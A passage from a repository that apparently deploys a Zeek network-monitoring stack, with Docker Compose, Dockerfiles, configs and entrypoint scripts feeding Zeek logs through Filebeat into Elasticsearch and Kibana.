15 | # - xpack.security.enabled=true
16 | # - xpack.security.enabled=false
17 | ports:
18 | - "9200:9200"
19 | networks:
20 | - elastinet
21 |
22 | kibana:
23 | depends_on:
24 | - elasticsearch
25 | build:
26 | context: ./kibana
27 | dockerfile: Dockerfile
28 | stdin_open: true # docker run -i
29 | tty: true
30 | privileged: true
31 | environment:
32 | # - ELASTICSEARCH_USERNAME=elastic
33 | # - ELASTICSEARCH_PASSWORD=Virtue@123
34 | - xpack.reporting.enabled=false
35 | ports:
36 | - "5601:5601"
37 | links:
38 | - elasticsearch
39 | networks:
40 | - elastinet
41 |
42 | filebeat:
43 | depends_on:
44 | - kibana
45 | build:
46 | context: ./filebeat
47 | args:
48 | VERSION : 7.7.1
49 | dockerfile: Dockerfile
50 | stdin_open: true # docker run -i
51 | tty: true
52 | privileged: true
53 | # environment:
54 | # - ELASTICSEARCH_USERNAME=elastic
55 | # - ELASTICSEARCH_PASSWORD=Virtue@123
56 | links:
57 | - kibana
58 | - elasticsearch
59 | volumes:
60 | - pcap:/pcap
61 | command: -e
62 | networks:
63 | - elastinet
64 |
65 | zeek:
66 | # depends_on:
67 | # - filebeat
68 | build:
69 | context: ./zeek/elastic
70 | dockerfile: Dockerfile
71 | stdin_open: true # docker run -i
72 | tty: true
73 | privileged: true
74 | volumes:
75 | - pcap:/pcap
76 | cap_add:
77 | - NET_RAW
78 | network_mode: "host"
79 | # command: zeek -i af_packet::eth0 local
80 | entrypoint: ["zeek", "-i", "af_packet::ens160", "local" ]
81 |
82 | networks:
83 | elastinet:
84 | driver: bridge
85 | name: elastinet
86 | ipam:
87 | config:
88 | - subnet: 192.168.3.0/24
89 | gateway: 192.168.3.1
90 | driver_opts:
91 | com.docker.network.bridge.name: elastinet
92 |
93 |
94 |
95 | volumes:
96 | pcap:
--------------------------------------------------------------------------------
/zeek/elasticsearch/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM openjdk:11-jre
2 |
3 | LABEL maintainer "https://github.com/blacktop"
4 |
5 | RUN set -ex; \
6 | # https://artifacts.elastic.co/GPG-KEY-elasticsearch
7 | wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | apt-key add -
8 | # key='46095ACC8548582C1A2699A9D27D666CD88E42B4'; \
9 | # export GNUPGHOME="$(mktemp -d)"; \
10 | # gpg --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; \
11 | # gpg --export "$key" > /etc/apt/trusted.gpg.d/elastic.gpg; \
12 | # rm -rf "$GNUPGHOME"; \
13 | # apt-key list
14 |
15 | # https://www.elastic.co/guide/en/elasticsearch/reference/current/setup-repositories.html
16 | # https://www.elastic.co/guide/en/elasticsearch/reference/5.0/deb.html
17 | RUN set -x \
18 | && apt-get update && apt-get install -y --no-install-recommends apt-transport-https && rm -rf /var/lib/apt/lists/* \
19 | && echo 'deb https://artifacts.elastic.co/packages/7.x/apt stable main' > /etc/apt/sources.list.d/elasticsearch.list
20 |
21 | ENV ELASTICSEARCH_VERSION 7.10.2
22 | ENV ELASTICSEARCH_DEB_VERSION 7.10.2
23 | ENV ELASTIC_CONTAINER=true
24 |
25 | RUN set -x \
26 | \
27 | # don't allow the package to install its sysctl file (causes the install to fail)
28 | # Failed to write '262144' to '/proc/sys/vm/max_map_count': Read-only file system
29 | && dpkg-divert --rename /usr/lib/sysctl.d/elasticsearch.conf \
30 | \
31 | && apt-get update \
32 | && apt-get install -y --no-install-recommends "elasticsearch=$ELASTICSEARCH_DEB_VERSION" \
33 | && rm -rf /var/lib/apt/lists/*
34 |
35 | ENV PATH /usr/share/elasticsearch/bin:$PATH
36 |
37 | WORKDIR /usr/share/elasticsearch
38 |
39 | RUN set -ex \
40 | && for path in \
41 | ./data \
42 | ./logs \
43 | ./config \
44 | ./config/scripts \
45 | ./config/ingest-geoip \
46 | ; do \
47 | mkdir -p "$path"; \
48 | chown -R elasticsearch:elasticsearch "$path"; \
49 | done
50 |
51 | COPY config/elastic/elasticsearch.yml /etc/elasticsearch/elasticsearch.yml
52 | COPY config/x-pack/log4j2.properties /usr/share/elasticsearch/config/x-pack/
53 | COPY config/logrotate /etc/logrotate.d/elasticsearch
54 | COPY elastic-entrypoint.sh /
55 | COPY docker-healthcheck /usr/local/bin/
56 |
57 | VOLUME ["/usr/share/elasticsearch/data"]
58 |
59 | EXPOSE 9200 9300
60 | ENTRYPOINT ["/elastic-entrypoint.sh"]
61 | CMD ["elasticsearch"]
62 |
63 | # HEALTHCHECK CMD ["docker-healthcheck"]
64 |
--------------------------------------------------------------------------------
/zeek/elasticsearch/VERSION:
--------------------------------------------------------------------------------
1 | x-pack
2 |
--------------------------------------------------------------------------------
/zeek/elasticsearch/config/elastic/elasticsearch.yml:
--------------------------------------------------------------------------------
1 | cluster.name: "docker-cluster"
2 | network.host: 0.0.0.0
3 |
4 | # this value is required because we set "network.host"
5 | # be sure to modify it appropriately for a production cluster deployment
6 | discovery.seed_hosts: ["127.0.0.1", "[::1]"]
7 | # node.master: true
8 | # node.ingest: true
9 | # node.data: true
10 |
11 | action.auto_create_index: .security,.monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*
12 | # discovery.type: "single-node"
13 |
14 | # bin/elasticsearch-keystore create
15 | # echo "changeme" | bin/elasticsearch-keystore add -x 'bootstrap.password'
16 |
17 | # xpack.security.authc.accept_default_password: true
18 | # xpack.security.transport.ssl.enabled: false
19 | # http -a elastic:changeme localhost:9200
20 | # curl -u elastic:changeme http://127.0.0.1:9200
21 |
22 | # bin/x-pack/setup-passwords \
23 | # auto --batch \
24 | # -Expack.ssl.certificate=x-pack/certificates/es01/es01.crt \
25 | # -Expack.ssl.certificate_authorities=x-pack/certificates/ca/ca.crt \
26 | # -Expack.ssl.key=x-pack/certificates/es01/es01.key \
27 | # --url https://localhost:9200
28 |
--------------------------------------------------------------------------------
/zeek/elasticsearch/config/elastic/log4j2.properties:
--------------------------------------------------------------------------------
1 | status = error
2 |
3 | appender.console.type = Console
4 | appender.console.name = console
5 | appender.console.layout.type = PatternLayout
6 | appender.console.layout.pattern = [%d{ISO8601}][%-5p][%-25c{1.}] %marker%m%n
7 |
8 | rootLogger.level = info
9 | rootLogger.appenderRef.console.ref = console
10 |
11 | logger.xpack_security_audit_logfile.name = org.elasticsearch.xpack.security.audit.logfile.LoggingAuditTrail
12 | logger.xpack_security_audit_logfile.appenderRef.console.ref = console
13 | logger.xpack_security_audit_logfile.level = info
--------------------------------------------------------------------------------
/zeek/elasticsearch/config/logrotate:
--------------------------------------------------------------------------------
1 | /var/log/elasticsearch/*.log {
2 | daily
3 | rotate 50
4 | size 50M
5 | copytruncate
6 | compress
7 | delaycompress
8 | missingok
9 | notifempty
10 | create 644 elasticsearch elasticsearch
11 | }
12 |
--------------------------------------------------------------------------------
/zeek/elasticsearch/config/x-pack/log4j2.properties:
--------------------------------------------------------------------------------
1 | status = error
2 |
3 | appender.console.type = Console
4 | appender.console.name = console
5 | appender.console.layout.type = PatternLayout
6 | appender.console.layout.pattern = [%d{ISO8601}][%-5p][%-25c{1.}] %marker%m%n
7 |
8 | rootLogger.level = info
9 | rootLogger.appenderRef.console.ref = console
10 |
--------------------------------------------------------------------------------
/zeek/elasticsearch/docker-healthcheck:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | set -eo pipefail
3 |
4 | host="$(hostname --ip-address || echo '127.0.0.1')"
5 |
6 | if health="$(curl -fsSL "http://$host:9200/_cat/health?h=status")"; then
7 | health="$(echo "$health" | sed -r 's/^[[:space:]]+|[[:space:]]+$//g')" # trim whitespace (otherwise we'll have "green ")
8 | if [ "$health" = 'green' ]; then
9 | exit 0
10 | fi
11 | echo >&2 "unexpected health status: $health"
12 | fi
13 |
14 | # If the probe returns 2 ("starting") when the container has already moved out of the "starting" state then it is treated as "unhealthy" instead.
15 | # https://github.com/docker/docker/blob/dcc65376bac8e73bb5930fce4cddc2350bb7baa2/docs/reference/builder.md#healthcheck
16 | exit 2
17 |
--------------------------------------------------------------------------------
/zeek/elasticsearch/elastic-entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | set -e
4 |
5 | umask 0002
6 |
7 | declare -a es_opts
8 |
9 | while IFS='=' read -r envvar_key envvar_value
10 | do
11 | # Elasticsearch env vars need to have at least two dot separated lowercase words, e.g. `cluster.name`
12 | if [[ "$envvar_key" =~ ^[a-z0-9_]+\.[a-z0-9_]+ ]]; then
13 | if [[ ! -z $envvar_value ]]; then
14 | es_opt="-E${envvar_key}=${envvar_value}"
15 | es_opts+=("${es_opt}")
16 | fi
17 | fi
18 | done < <(env)
19 |
20 | export ES_JAVA_OPTS="-Des.cgroups.hierarchy.override=/ $ES_JAVA_OPTS"
21 |
22 |
23 | if [[ -d bin/x-pack ]]; then
24 | # Check for the ELASTIC_PASSWORD environment variable to set the
25 | # bootstrap password for Security.
26 | #
27 | # This is only required for the first node in a cluster with Security
28 | # enabled, but we have no way of knowing which node we are yet. We'll just
29 | # honor the variable if it's present.
30 | if [[ -n "$ELASTIC_PASSWORD" ]]; then
31 | [[ -f /usr/share/elasticsearch/config/elasticsearch.keystore ]] || (echo "y" | elasticsearch-keystore create)
32 | if ! (elasticsearch-keystore list | grep -q '^bootstrap.password$'); then
33 | (echo "$ELASTIC_PASSWORD" | elasticsearch-keystore add -x 'bootstrap.password')
34 | fi
35 | fi
36 | fi
37 |
38 | # Add elasticsearch as command if needed
39 | if [ "${1:0:1}" = '-' ]; then
40 | set -- elasticsearch "$@"
41 | fi
42 |
43 | # Drop root privileges if we are running elasticsearch
44 | # allow the container to be started with `--user`
45 | if [ "$1" = 'elasticsearch' -a "$(id -u)" = '0' ]; then
46 | # Change the ownership of user-mutable directories to elasticsearch
47 | chown -R elasticsearch:elasticsearch /usr/share/elasticsearch/{data,logs,config}
48 |
49 | set -- chroot --userspec=elasticsearch / "$@" "${es_opts[@]}"
50 | fi
51 |
52 | exec "$@"
53 |
--------------------------------------------------------------------------------
/zeek/elasticsearch/hooks/post_push:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | set -e
4 |
5 | VERSION=$(cat Dockerfile | grep '^ENV ELASTICSEARCH_VERSION' | cut -d" " -f3)
6 | TAGS=($VERSION 7)
7 |
8 | for TAG in "${TAGS[@]}"; do
9 | echo "===> Tagging $IMAGE_NAME as $DOCKER_REPO:$CACHE_TAG-$TAG"
10 | docker tag $IMAGE_NAME $DOCKER_REPO:$CACHE_TAG-$TAG
11 | echo "===> Pushing $DOCKER_REPO:$CACHE_TAG-$TAG"
12 | docker push $DOCKER_REPO:$CACHE_TAG-$TAG
13 | done
14 |
--------------------------------------------------------------------------------
/zeek/filebeat/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM alpine:3.12
2 |
3 | LABEL maintainer "https://github.com/blacktop"
4 |
5 | ARG VERSION
6 |
7 | RUN apk add --no-cache libc6-compat curl jq
8 |
9 | RUN \
10 | cd /tmp \
11 | && wget https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-${VERSION}-linux-x86_64.tar.gz \
12 | && tar xzvf filebeat-${VERSION}-linux-x86_64.tar.gz \
13 | && mv filebeat-${VERSION}-linux-x86_64 /usr/share/filebeat \
14 | && mkdir /usr/share/filebeat/logs /usr/share/filebeat/data \
15 | && rm /tmp/*
16 |
17 | ENV PATH $PATH:/usr/share/filebeat
18 |
19 | COPY config /usr/share/filebeat
20 |
21 | COPY entrypoint.sh /usr/local/bin/entrypoint
22 | RUN chmod +x /usr/local/bin/entrypoint
23 |
24 | WORKDIR /usr/share/filebeat
25 |
26 | ENTRYPOINT ["entrypoint"]
27 | CMD ["-h"]
--------------------------------------------------------------------------------
/zeek/filebeat/LATEST:
--------------------------------------------------------------------------------
1 | 7.7.1
--------------------------------------------------------------------------------
/zeek/filebeat/config/filebeat.yml:
--------------------------------------------------------------------------------
1 | filebeat.config:
2 | modules:
3 | path: ${path.config}/modules.d/*.yml
4 | reload.enabled: false
5 |
6 | # filebeat.autodiscover:
7 | # providers:
8 | # - type: docker
9 | # hints.enabled: true
10 |
11 | filebeat.modules:
12 | - module: zeek
13 | # All logs
14 | connection:
15 | enabled: true
16 | var.paths:
17 | - /pcap/conn*.log
18 | dns:
19 | enabled: true
20 | var.paths:
21 | - /pcap/dns*.log
22 | http:
23 | enabled: true
24 | var.paths:
25 | - /pcap/http*.log
26 | files:
27 | enabled: true
28 | var.paths:
29 | - /pcap/files*.log
30 | ssl:
31 | enabled: true
32 | var.paths:
33 | - /pcap/ssl*.log
34 | notice:
35 | enabled: true
36 | var.paths:
37 | - /pcap/notice*.log
38 |
39 | processors:
40 | - add_cloud_metadata: ~
41 |
42 | output.elasticsearch:
43 | hosts: '${ELASTICSEARCH_HOSTS:elasticsearch:9200}'
44 | username: '${ELASTICSEARCH_USERNAME:}'
45 | password: '${ELASTICSEARCH_PASSWORD:}'
46 |
47 | setup.kibana:
48 | host: '${KIBANA_HOST:kibana:5601}'
--------------------------------------------------------------------------------
/zeek/filebeat/entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | set -e
4 |
5 | geoipInfo(){
6 | ELASTICSEARCH_HOSTS=${ELASTICSEARCH_HOSTS:-elasticsearch:9200}
7 | echo "===> Adding geoip-info pipeline..."
8 | curl -s -X PUT "${ELASTICSEARCH_HOSTS}/_ingest/pipeline/geoip-info" -H 'Content-Type: application/json' -d'
9 | {
10 | "description": "Add geoip info",
11 | "processors": [
12 | {
13 | "geoip": {
14 | "field": "client.ip",
15 | "target_field": "client.geo",
16 | "ignore_missing": true
17 | }
18 | },
19 | {
20 | "geoip": {
21 | "field": "source.ip",
22 | "target_field": "source.geo",
23 | "ignore_missing": true
24 | }
25 | },
26 | {
27 | "geoip": {
28 | "field": "id.orig_h",
29 | "target_field": "source.geo",
30 | "ignore_missing": true
31 | }
32 | },
33 | {
34 | "geoip": {
35 | "field": "destination.ip",
36 | "target_field": "destination.geo",
37 | "ignore_missing": true
38 | }
39 | },
40 | {
41 | "geoip": {
42 | "field": "id.resp_h",
43 | "target_field": "destination.geo",
44 | "ignore_missing": true
45 | }
46 | },
47 | {
48 | "geoip": {
49 | "field": "server.ip",
50 | "target_field": "server.geo",
51 | "ignore_missing": true
52 | }
53 | },
54 | {
55 | "geoip": {
56 | "field": "host.ip",
57 | "target_field": "host.geo",
58 | "ignore_missing": true
59 | }
60 | }
61 | ]
62 | }
63 | '
64 | echo -e "\n * Done."
65 | }
66 | # Wait for elasticsearch to start. It requires that the status be either
67 | # green or yellow.
68 | waitForElasticsearch() {
69 | ELASTICSEARCH_HOSTS=${ELASTICSEARCH_HOSTS:-elasticsearch:9200}
70 | echo -n "===> Waiting on elasticsearch(${ELASTICSEARCH_HOSTS}) to start..."
71 | i=0;
72 | while [ $i -le 60 ]; do
73 | health=$(curl --silent "${ELASTICSEARCH_HOSTS}/_cat/health" | awk '{print $4}')
74 | if [[ "$health" == "green" ]] || [[ "$health" == "yellow" ]]
75 | then
76 | echo
77 | echo "Elasticsearch is ready!"
78 | return 0
79 | fi
80 |
81 | echo -n '.'
82 | sleep 1
83 | i=$((i+1));
84 | done
85 |
86 | echo
87 | echo >&2 'Elasticsearch is not running or is not healthy.'
88 | echo >&2 "Address: ${ELASTICSEARCH_HOSTS}"
89 | echo >&2 "$health"
90 | exit 1
91 | }
92 |
93 | # Wait for kibana to start
94 | waitForKibana() {
95 | echo -n "===> Waiting for kibana to start..."
96 | i=1
97 | while [ $i -le 20 ]; do
98 |
99 | status=$(curl --silent -XGET http://localhost:5601/api/status | jq -r '.status.overall.state')
100 |
101 | if [[ "$status" = "green" ]] ; then
102 | echo "kibana is ready!"
103 | return 0
104 | fi
105 |
106 | echo -n '.'
107 | sleep 1
108 | i=$((i+1))
109 | done
110 |
111 | echo
112 | echo >&2 "${2} is not available"
113 | echo >&2 "Address: ${1}"
114 | }
115 |
116 | if [[ -z $1 ]] || [[ ${1:0:1} == '-' ]] ; then
117 | waitForElasticsearch
118 | # geoipInfo
119 | waitForKibana ${KIBANA_HOST:-kibana:5601}
120 | echo "===> Setting up filebeat..."
121 | filebeat setup --modules zeek -e -E 'setup.dashboards.enabled=true'
122 | echo "===> Starting filebeat..."
123 | exec filebeat "$@"
124 | fi
125 |
126 | exec "$@"
--------------------------------------------------------------------------------
/zeek/filebeat/hooks/build:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | docker build --build-arg VERSION=$VERSION -t $IMAGE_NAME .
--------------------------------------------------------------------------------
/zeek/filebeat/hooks/post_push:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | set -e
4 |
5 | VERSION=$(cat LATEST)
6 | TAGS=($VERSION 7)
7 |
8 | for TAG in "${TAGS[@]}"; do
9 | echo "===> Tagging $IMAGE_NAME as $DOCKER_REPO:$TAG"
10 | docker tag $IMAGE_NAME $DOCKER_REPO:$TAG
11 | echo "===> Pushing $DOCKER_REPO:$TAG"
12 | docker push $DOCKER_REPO:$TAG
13 | done
--------------------------------------------------------------------------------
/zeek/kibana/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM node:10.23.1-alpine
2 |
3 | LABEL maintainer "https://github.com/blacktop"
4 |
5 | ENV VERSION 7.10.2
6 | ENV DOWNLOAD_URL https://artifacts.elastic.co/downloads/kibana
7 | ENV TARBAL "${DOWNLOAD_URL}/kibana-${VERSION}-linux-x86_64.tar.gz"
8 | ENV TARBALL_ASC "${DOWNLOAD_URL}/kibana-${VERSION}-linux-x86_64.tar.gz.asc"
9 | ENV TARBALL_SHA "aa68f850cc09cf5dcb7c0b48bb8df788ca58eaad38d96141b8e59917fd38b42c728c0968f7cb2c8132c5aaeb595525cdde0859554346c496f53c569e03abe412"
10 | ENV GPG_KEY "46095ACC8548582C1A2699A9D27D666CD88E42B4"
11 |
12 | ENV PATH /usr/share/kibana/bin:$PATH
13 |
14 | RUN apk add --no-cache bash su-exec libc6-compat
15 | RUN apk add --no-cache -t .build-deps wget ca-certificates gnupg openssl \
16 | && set -ex \
17 | && cd /tmp \
18 | && echo "===> Install Kibana..." \
19 | && wget --progress=bar:force -O kibana.tar.gz "$TARBAL"; \
20 | if [ "$TARBALL_SHA" ]; then \
21 | echo "$TARBALL_SHA *kibana.tar.gz" | sha512sum -c -; \
22 | fi; \
23 | if [ "$TARBALL_ASC" ]; then \
24 | wget --progress=bar:force -O kibana.tar.gz.asc "$TARBALL_ASC"; \
25 | export GNUPGHOME="$(mktemp -d)"; \
26 | ( gpg --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPG_KEY" \
27 | || gpg --keyserver pgp.mit.edu --recv-keys "$GPG_KEY" \
28 | || gpg --keyserver keyserver.pgp.com --recv-keys "$GPG_KEY" ); \
29 | gpg --batch --verify kibana.tar.gz.asc kibana.tar.gz; \
30 | rm -rf "$GNUPGHOME" kibana.tar.gz.asc || true; \
31 | fi; \
32 | tar -xf kibana.tar.gz \
33 | && ls -lah \
34 | && mv kibana-$VERSION-linux-x86_64 /usr/share/kibana \
35 | && adduser -DH -s /sbin/nologin kibana \
36 | # usr alpine nodejs and not bundled version
37 | && bundled='NODE="${DIR}/node/bin/node"' \
38 | && alpine_node='NODE="/usr/local/bin/node"' \
39 | && sed -i "s|$bundled|$alpine_node|g" /usr/share/kibana/bin/kibana-plugin \
40 | && sed -i "s|$bundled|$alpine_node|g" /usr/share/kibana/bin/kibana \
41 | && rm -rf /usr/share/kibana/node \
42 | && chown -R kibana:kibana /usr/share/kibana \
43 | && rm -rf /tmp/* \
44 | && apk del --purge .build-deps
45 |
46 | COPY config/kibana/kibana.yml /usr/share/kibana/config/kibana.yml
47 | COPY docker-entrypoint.sh /
48 | RUN chmod +x /docker-entrypoint.sh
49 |
50 | WORKDIR /usr/share/kibana
51 |
52 | EXPOSE 5601
53 |
54 | ENTRYPOINT ["/docker-entrypoint.sh"]
55 | CMD ["kibana"]
56 |
--------------------------------------------------------------------------------
/zeek/kibana/VERSION:
--------------------------------------------------------------------------------
1 | 5.0
2 |
--------------------------------------------------------------------------------
/zeek/kibana/config/kibana/kibana.yml:
--------------------------------------------------------------------------------
1 | # Kibana is served by a back end server. This setting specifies the port to use.
2 | #server.port: 5601
3 |
4 | # Specifies the address to which the Kibana server will bind. IP addresses and host names are both valid values.
5 | # The default is 'localhost', which usually means remote machines will not be able to connect.
6 | # To allow connections from remote users, set this parameter to a non-loopback address.
7 | server.name: kibana
8 | server.host: "0"
9 |
10 | # Enables you to specify a path to mount Kibana at if you are running behind a proxy.
11 | # Use the `server.rewriteBasePath` setting to tell Kibana if it should remove the basePath
12 | # from requests it receives, and to prevent a deprecation warning at startup.
13 | # This setting cannot end in a slash.
14 | #server.basePath: ""
15 |
16 | # Specifies whether Kibana should rewrite requests that are prefixed with
17 | # `server.basePath` or require that they are rewritten by your reverse proxy.
18 | # This setting was effectively always `false` before Kibana 6.3 and will
19 | # default to `true` starting in Kibana 7.0.
20 | #server.rewriteBasePath: false
21 |
22 | # The maximum payload size in bytes for incoming server requests.
23 | #server.maxPayloadBytes: 1048576
24 |
25 | # The Kibana server's name. This is used for display purposes.
26 | #server.name: "your-hostname"
27 |
28 | # The URLs of the Elasticsearch instances to use for all your queries.
29 | elasticsearch.hosts: ["http://elasticsearch:9200"]
30 | # When this setting's value is true Kibana uses the hostname specified in the server.host
31 | # setting. When the value of this setting is false, Kibana uses the hostname of the host
32 | # that connects to this Kibana instance.
33 | #elasticsearch.preserveHost: true
34 |
35 | # Kibana uses an index in Elasticsearch to store saved searches, visualizations and
36 | # dashboards. Kibana creates a new index if the index doesn't already exist.
37 | #kibana.index: ".kibana"
38 |
39 | # The default application to load.
40 | #kibana.defaultAppId: "home"
41 |
42 | # If your Elasticsearch is protected with basic authentication, these settings provide
43 | # the username and password that the Kibana server uses to perform maintenance on the Kibana
44 | # index at startup. Your Kibana users still need to authenticate with Elasticsearch, which
45 | # is proxied through the Kibana server.
46 | #elasticsearch.username: "user"
47 | #elasticsearch.password: "pass"
48 |
49 | # Enables SSL and paths to the PEM-format SSL certificate and SSL key files, respectively.
50 | # These settings enable SSL for outgoing requests from the Kibana server to the browser.
51 | #server.ssl.enabled: false
52 | #server.ssl.certificate: /path/to/your/server.crt
53 | #server.ssl.key: /path/to/your/server.key
54 |
55 | # Optional settings that provide the paths to the PEM-format SSL certificate and key files.
56 | # These files validate that your Elasticsearch backend uses the same key files.
57 | #elasticsearch.ssl.certificate: /path/to/your/client.crt
58 | #elasticsearch.ssl.key: /path/to/your/client.key
59 |
60 | # Optional setting that enables you to specify a path to the PEM file for the certificate
61 | # authority for your Elasticsearch instance.
62 | #elasticsearch.ssl.certificateAuthorities: [ "/path/to/your/CA.pem" ]
63 |
64 | # To disregard the validity of SSL certificates, change this setting's value to 'none'.
65 | #elasticsearch.ssl.verificationMode: full
66 |
67 | # Time in milliseconds to wait for Elasticsearch to respond to pings. Defaults to the value of
68 | # the elasticsearch.requestTimeout setting.
69 | #elasticsearch.pingTimeout: 1500
70 |
71 | # Time in milliseconds to wait for responses from the back end or Elasticsearch. This value
72 | # must be a positive integer.
73 | #elasticsearch.requestTimeout: 30000
74 |
75 | # List of Kibana client-side headers to send to Elasticsearch. To send *no* client-side
76 | # headers, set this value to [] (an empty list).
77 | #elasticsearch.requestHeadersWhitelist: [ authorization ]
78 |
79 | # Header names and values that are sent to Elasticsearch. Any custom headers cannot be overwritten
80 | # by client-side headers, regardless of the elasticsearch.requestHeadersWhitelist configuration.
81 | #elasticsearch.customHeaders: {}
82 |
83 | # Time in milliseconds for Elasticsearch to wait for responses from shards. Set to 0 to disable.
84 | #elasticsearch.shardTimeout: 30000
85 |
86 | # Time in milliseconds to wait for Elasticsearch at Kibana startup before retrying.
87 | #elasticsearch.startupTimeout: 5000
88 |
89 | # Logs queries sent to Elasticsearch. Requires logging.verbose set to true.
90 | #elasticsearch.logQueries: false
91 |
92 | # Specifies the path where Kibana creates the process ID file.
93 | #pid.file: /var/run/kibana.pid
94 |
95 | # Enables you specify a file where Kibana stores log output.
96 | #logging.dest: stdout
97 |
98 | # Set the value of this setting to true to suppress all logging output.
99 | #logging.silent: false
100 |
101 | # Set the value of this setting to true to suppress all logging output other than error messages.
102 | #logging.quiet: false
103 |
104 | # Set the value of this setting to true to log all events, including system usage information
105 | # and all requests.
106 | #logging.verbose: false
107 |
108 | # Set the interval in milliseconds to sample system and process performance
109 | # metrics. Minimum is 100ms. Defaults to 5000.
110 | #ops.interval: 5000
111 |
112 | # Specifies locale to be used for all localizable strings, dates and number formats.
113 | #i18n.locale: "en"
114 |
115 | xpack.monitoring.ui.container.elasticsearch.enabled: true
116 |
--------------------------------------------------------------------------------
/zeek/kibana/config/logrotate:
--------------------------------------------------------------------------------
1 | /var/log/kibana/*.log {
2 | daily
3 | rotate 50
4 | size 50M
5 | copytruncate
6 | compress
7 | delaycompress
8 | missingok
9 | notifempty
10 | create 644 kibana kibana
11 | }
12 |
--------------------------------------------------------------------------------
/zeek/kibana/docker-entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | set -e
3 |
4 | declare -a kb_opts
5 |
6 | # Parse env vars of the form: kibana.setting=value
7 | while IFS='=' read -r envvar_key envvar_value
8 | do
9 | # Elasticsearch env vars need to have at least two dot separated lowercase words, e.g. `cluster.name`
10 | if [[ "$envvar_key" =~ ^[a-z0-9_]+\.[a-z0-9_]+ ]]; then
11 | if [[ ! -z $envvar_value ]]; then
12 | kb_opt="--${envvar_key}=${envvar_value}"
13 | kb_opts+=("${kb_opt}")
14 | fi
15 | fi
16 | done < <(env)
17 |
18 | # Parse env vars of the form: KIBANA_SETTING=value
19 | while IFS='=' read -r envvar_key envvar_value
20 | do
21 | # Elasticsearch env vars need to have at least two dot separated lowercase words, e.g. `CLUSTER_NAME`
22 | if [[ "$envvar_key" =~ ^KIBANA_[A-Z0-9_]+ ]]; then
23 | kib_name=`echo "${envvar_key#"KIBANA_"}" | tr '[:upper:]' '[:lower:]' | tr _ .`
24 | if [[ ! -z $envvar_value ]]; then
25 | kb_opt="--${kib_name}=${envvar_value}"
26 | kb_opts+=("${kb_opt}")
27 | fi
28 | fi
29 | done < <(env)
30 |
31 | # Take ownership of SSL certs
32 | if [[ -n "$KIBANA_SERVER_SSL" ]]; then
33 | if [[ -n "$KIBANA_SERVER_SSL_KEY" ]]; then
34 | chown kibana:kibana $KIBANA_SERVER_SSL_KEY
35 | fi
36 | if [[ -n "$KIBANA_SERVER_SSL_KEY" ]]; then
37 | chown kibana:kibana $KIBANA_SERVER_SSL_KEY
38 | fi
39 | fi
40 |
41 | # Add kibana as command if needed
42 | if [[ "$1" == -* ]]; then
43 | set -- kibana "$@"
44 | fi
45 |
46 | # Run as user "kibana" if the command is "kibana"
47 | if [ "$1" = 'kibana' -a "$(id -u)" = '0' ]; then
48 | echo "$@" "${kb_opts[@]}"
49 | set -- su-exec kibana "$@" "${kb_opts[@]}"
50 | fi
51 |
52 | exec "$@"
53 |
--------------------------------------------------------------------------------
/zeek/kibana/hooks/post_push:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | set -e
4 |
5 | VERSION=$(cat Dockerfile | grep '^ENV VERSION' | cut -d" " -f3)
6 | TAGS=($VERSION 7)
7 |
8 | for TAG in "${TAGS[@]}"; do
9 | echo "===> Tagging $IMAGE_NAME as $DOCKER_REPO:$CACHE_TAG-$TAG"
10 | docker tag $IMAGE_NAME $DOCKER_REPO:$CACHE_TAG-$TAG
11 | echo "===> Pushing $DOCKER_REPO:$CACHE_TAG-$TAG"
12 | docker push $DOCKER_REPO:$CACHE_TAG-$TAG
13 | done
14 |
--------------------------------------------------------------------------------
/zeek/zeek/elastic/.dockerignore:
--------------------------------------------------------------------------------
1 | # Ignore .git folder
2 | .git*
3 |
4 | build
5 | extract_files
6 | CHANGELOG.md
7 | LICENSE
8 | Makefile
9 | README.md
10 | README.md.bu
11 | VERSION
12 | circle.yml
13 | docker-compose.yml
14 | logo.png
15 |
--------------------------------------------------------------------------------
/zeek/zeek/elastic/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM alpine:3.14 as builder
2 |
3 | LABEL maintainer "Nikhil"
4 |
5 | ENV ZEEK_VERSION 4.1.1
6 |
7 | RUN apk add --no-cache zlib openssl libstdc++ libpcap libgcc
8 | RUN apk add --no-cache -t .build-deps \
9 | bsd-compat-headers \
10 | libmaxminddb-dev \
11 | linux-headers \
12 | openssl-dev \
13 | libpcap-dev \
14 | python3-dev \
15 | zlib-dev \
16 | binutils \
17 | fts-dev \
18 | cmake \
19 | clang \
20 | bison \
21 | bash \
22 | swig \
23 | perl \
24 | make \
25 | flex \
26 | git \
27 | g++ \
28 | fts
29 |
30 | RUN echo "===> Cloning zeek..." \
31 | && cd /tmp \
32 | && git clone --recursive --branch v$ZEEK_VERSION https://github.com/zeek/zeek.git
33 |
34 | RUN echo "===> Compiling zeek..." \
35 | && cd /tmp/zeek \
36 | && CC=clang ./configure --prefix=/usr/local/zeek \
37 | --build-type=MinSizeRel \
38 | --disable-broker-tests \
39 | --disable-zeekctl \
40 | --disable-auxtools \
41 | --disable-python \
42 | && make -j 2 \
43 | && make install
44 |
45 | RUN echo "===> Compiling af_packet plugin..." \
46 | && cd /tmp/zeek/auxil/ \
47 | && git clone https://github.com/J-Gras/zeek-af_packet-plugin.git \
48 | && cd /tmp/zeek/auxil/zeek-af_packet-plugin \
49 | && CC=clang ./configure --with-kernel=/usr --zeek-dist=/tmp/zeek \
50 | && make -j 2 \
51 | && make install \
52 | && /usr/local/zeek/bin/zeek -NN Zeek::AF_Packet
53 |
54 | RUN echo "===> Installing hosom/file-extraction package..." \
55 | && cd /tmp \
56 | && git clone https://github.com/hosom/file-extraction.git \
